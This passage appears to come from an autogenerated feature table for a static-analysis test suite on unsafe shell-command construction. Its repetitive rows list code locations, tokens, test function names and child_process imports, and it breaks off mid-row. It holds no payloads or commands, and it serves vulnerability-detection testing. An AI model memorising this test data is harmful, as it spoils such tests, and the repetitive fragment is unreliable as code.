Object. ... \\t{}\\n\\t\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | exceptional return of Object. ... \\t{}\\n\\t\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | exceptional return of Object. ... \\t{}\\n\\t\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:10:457:16 | entries | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:10:457:16 | entries | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:10:457:16 | entries | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | CalleeFlexibleAccessPath | Object.entries | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:18:457:24 | myFuncs | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:27:457:32 | reduce | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:27:457:32 | reduce | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:27:457:32 | reduce | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | 'arguments' object of anonymous function | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | 'arguments' object of anonymous function | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | (props, ... },\\n\\t\\t\\t) | CalleeFlexibleAccessPath | Object.entries().reduce | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | (props, ... },\\n\\t\\t\\t) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | (props, ... },\\n\\t\\t\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | (props, ... },\\n\\t\\t\\t) | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | (props, ... },\\n\\t\\t\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | exceptional return of anonymous function | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | exceptional return of anonymous function | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | return of anonymous function | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | return of anonymous function | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:4:466:4 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:5:458:9 | props | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | [ key, value ] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | [ key, value ] | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | [ key, value ] | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | [ key, value ] | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | [ key, value ] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | key | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | key | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | key | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | key | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | key | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | value | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | value | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | value | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:12:458:25 | value | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | contextSurroundingFunctionParameters | (props, ?) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | enclosingFunctionBody | props key value Object assign props key value configurable true | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | enclosingFunctionName | reduce#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:14:458:16 | key | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:19:458:23 | value | contextFunctionInterfaces | 